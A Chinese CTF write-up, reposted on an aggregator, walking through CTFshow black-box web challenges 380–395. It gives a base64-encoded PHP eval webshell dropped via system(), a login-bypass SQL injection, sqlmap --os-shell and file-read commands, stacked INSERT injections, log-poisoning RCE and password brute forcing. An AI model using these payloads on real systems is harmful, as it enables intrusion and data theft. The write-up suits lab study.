CTFshow黑盒测试刷题

news/2024/11/17 10:10:16/文章来源:https://www.cnblogs.com/WTT001/p/18550295

web380

先扫目录

打开

报错了

先用伪协议去查看源码

之前扫到有flag.php

访问一下

就得到flag了

web381

查看一下源码

点击第三个css

藏在目录里面

web382

跟上题一样

不过访问这个页面是一个登录框

试一下弱口令

最后是admin

admin888

就进去了

web383

![](https://cdn.nlark.com/yuque/0/2024/png/42978625/1729836559470-bef8f65f-8023-47a6-91f9-130ab93efdfa.png)

进入这个后台

用万能密码

admin' or 1=1#..

就可以进去了

web384

提示
密码前2位是小写字母,后三位是数字

用脚本生成一个字典

再用BP爆破一下

admin

xy123

web385

扫目录

访问一下

访问install/?install

默认密码是:

admin

admin888

再访问一下后台进去就行了

web386

构造payload

/clear.php?file=./install/lock.dat

清理掉之后跟上题一样

admin

admin888

就可以了

web387

扫目录,找到

/robots.txt

访问一下

/debug

file传参找到目录

/debug?file=/var/log/nginx/access.log

找到日志

/var/www/html/1.txt');?>

rce执行一下

再访问一下

找到了目录

查看

找到文件

查看这个文件的源码

/var/www/html/1.txt');?>

就找到flag了

web388

目录扫到有编辑器

上传一个文件

文件内容:

<?php 
system('echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==" | base64 -d > /var/www/html/shell.php');
?>

file传个路径上去

在跟上文件地址

显示已上传shell文件

查看目录

查看文件内容

源码中找到flag

web389

首先显示权限不足

cookies改权限

之后就和上题一样了

web390

sqlmap -u [https://c68397cc-8479-4947-a7c4-edfecd468f30.challenge.ctf.show/page.php?id=1](https://c68397cc-8479-4947-a7c4-edfecd468f30.challenge.ctf.show/page.php?id=1) --os-shell

就得到了flag

sqlmap -u https://c68397cc-8479-4947-a7c4-edfecd468f30.challenge.ctf.show/page.php?id=1 --file-read /var/www/html/alsckdfy/check.php --batch

直接读取文件也行

web391

sqlmap -u [https://8a018f60-20e9-4879-a24c-ec147c0e5a23.challenge.ctf.show/search.php?title=1](https://8a018f60-20e9-4879-a24c-ec147c0e5a23.challenge.ctf.show/search.php?title=1) --os-shell

这题是这个输入框有sql注入漏洞

web392

和上题一样

sqlmap -u https://482a803a-36ed-45aa-b1f4-503b856dff17.challenge.ctf.show/search.php?title=1 --os-shell

不一样的是这题直接查看flag

web393

找了半天还是搜索框存在注入

https://4f174420-01b7-4271-bf73-a5f71f243eb8.challenge.ctf.show/search.php?title=1

不过这一次--os-shell跑不出来

直接--dbs

-D ctfshow -T link --columns找到

search.php?title=1';insert into link values (11,'a','file:///flag');#

然后访问link.php?id=11

得到flag

web394

前面同上

只不过加了过滤

search.php?title=1';insert into link values (11,'a','66696c653a2f2f2f7661722f7777772f68746d6c2f616c73636b6466792f636865636b2e706870');#

之后访问link.php?id=10

源码发现flag

web395

同上

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/835219.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

[BSidesCF 2020]Had a bad day 1

[BSidesCF 2020]Had a bad day 1 打开实例为一个随机猫狗图片网页点击WOOFERS,显示出一张狗子的图片,并发现参数?category=woofers尝试sql注入验证,闭合,发现报错信息发现include_path函数,猜测可能存在文件包含 构造payload,尝试读取index.php ?category=php://filter…

2024御宛杯

2024御宛杯图片的隐藏题目提示6位数字爆破一下改个宽高扫描就行NYSEC{abcdefghiklmn}啥玩意啊这赛博厨子flag{HNCTFbs345680967709b5}List of file signatures每四个字节翻转f=open("fl4g.jpeg",rb)ff=open("out.jpeg","wb")a=f.read()l=len(a)f…

ctfshow图片刷题

misc1 打开就是flagctfshow{22f1fb91fc4169f1c9411ce632a0ed8d} misc2 改后缀名pngctfshow{6f66202f21ad22a2a19520cdd3f69e7b} misc3 .bpg的图片 用这个工具打开 https://bellard.org/bpg/ctfshow{aade771916df7cde3009c0e631f9910d} misc4 逐个改后缀名就可以得到图片,合起来…

windows服务器应急响应

windows服务器应急响应首先环境是这样的,比linux应急响应好多了,有图形界面...1.请提交攻击者攻击成功的第一时间,格式:YY:MM:DD hh:mm:ss在phpstudy目录下搜索日志文件省赛用的是别人的工具,只能肉眼观察喽,个人习惯于010,可惜省赛有可能不提供...这条是登录了管理员账…

DIDCTF-2022暑假取证学习

DIDCTF-2022暑假取证学习1.请找出操作系统主机名WIN-49I0SNRJAMF2.请给出源磁盘的SHA256哈希值。这个软件没找到Autopsy 这个软件计算时间太长了,就...3.请找出操作系统中安装的Android模拟器名称和安装日期。格式:模拟器名时间例子:雷电模拟器2022年06月23日夜神模拟器2021…

2024腾龙杯-easy_Forensics

2024腾龙杯-easy_Forensicsvol.py -f 3.img --profile=Win7SP1x64 filescan | grep -E "png|zip|rar|jpg|txt"找到一张图片提取出来发现有压缩包分离出来解压得镜像导出来镜像里面是一个hint.txt打开是坐标,需要画图直接用gnuplot画图解码就行Here is the vigenere …

团队项目Scrum冲刺-day6

一、每天举行站立式会议 站立式会议照片一张 昨天已完成的工作成员 任务陈国金 代码沙箱Java实现凌枫 创建题目页面部分内容陈卓恒 更新题目界面谭立业 浏览题目页面廖俊龙 接口测试曾平凡 前端页面测试曾俊涛 协助代码沙箱Java实现薛秋昊 协助代码沙箱Java实现今天计划完成的工…

2024GHCTF的三道取证题

2024GHCTF的三道取证题[GHCTF 2024 新生赛]皆非取证vol.py -f chall.vmem --profile=Win7SP1x64 filescan | grep zip找到压缩包vol.py -f chall.vmem --profile=Win7SP1x64 mimikatzmrl64l0v3miku这个是密码,解压得flag[GHCTF 2024 新生赛]是名取证vol.py -f chall.vmem --pr…

NSSRound#12 Basic-ordinary forensics

NSSRound#12 Basic-ordinary forensics[NSSRound#12 Basic]ordinary forensicsvol.py -f forensics.raw --profile=Win7SP1x64 cmdscan找到了一个密码U_find_1tvol.py -f forensics.raw --profile=Win7SP1x64 filescan | grep zip提取这个压缩包vol.py -f forensics.raw --prof…

2024BaseCTF-re

BaseCTF-reYou are good at IDA直接按F5得到一地段flagY0u_4Re_第二段提示F12双击打开按x900d_47_最后一段提示在Interesting函数之中id4BaseCTF{Y0u_4Re_900d_47_id4}UPX mini先脱壳拖入IDA,base64解码就好BasePlusF5找到key0xEbase64换表+异或BaseCTF{BA5e_DEcoD1N6_sEcr3t…

软件开发从“划分即实验”到生产

🎯软件开发从“划分即实验”到生产✅产生阶段→开发阶段(单个系统开发:划分即实验= 总体规划、系统分析、系统设计、系统实施、系统验收)→运行阶段→消亡阶段 - 📋 划:开发目标、总体架构、组织结构和管理流程、实施计划、技术规范等 - 🔍 分:组织结构及功能分…

2021陇剑杯-内存取证

陇剑杯 2021 内存分析(问1)网管小王制作了一个虚拟机文件,让您来分析后作答:虚拟机的密码是_____________。(密码中为flag{xxxx},含有空格,提交时不要去掉)。mimikatz一把梭了flag{W31C0M3 T0 THiS 34SY F0R3NSiCX}内存分析(问2)网管小王制作了一个虚拟机文件,让您来…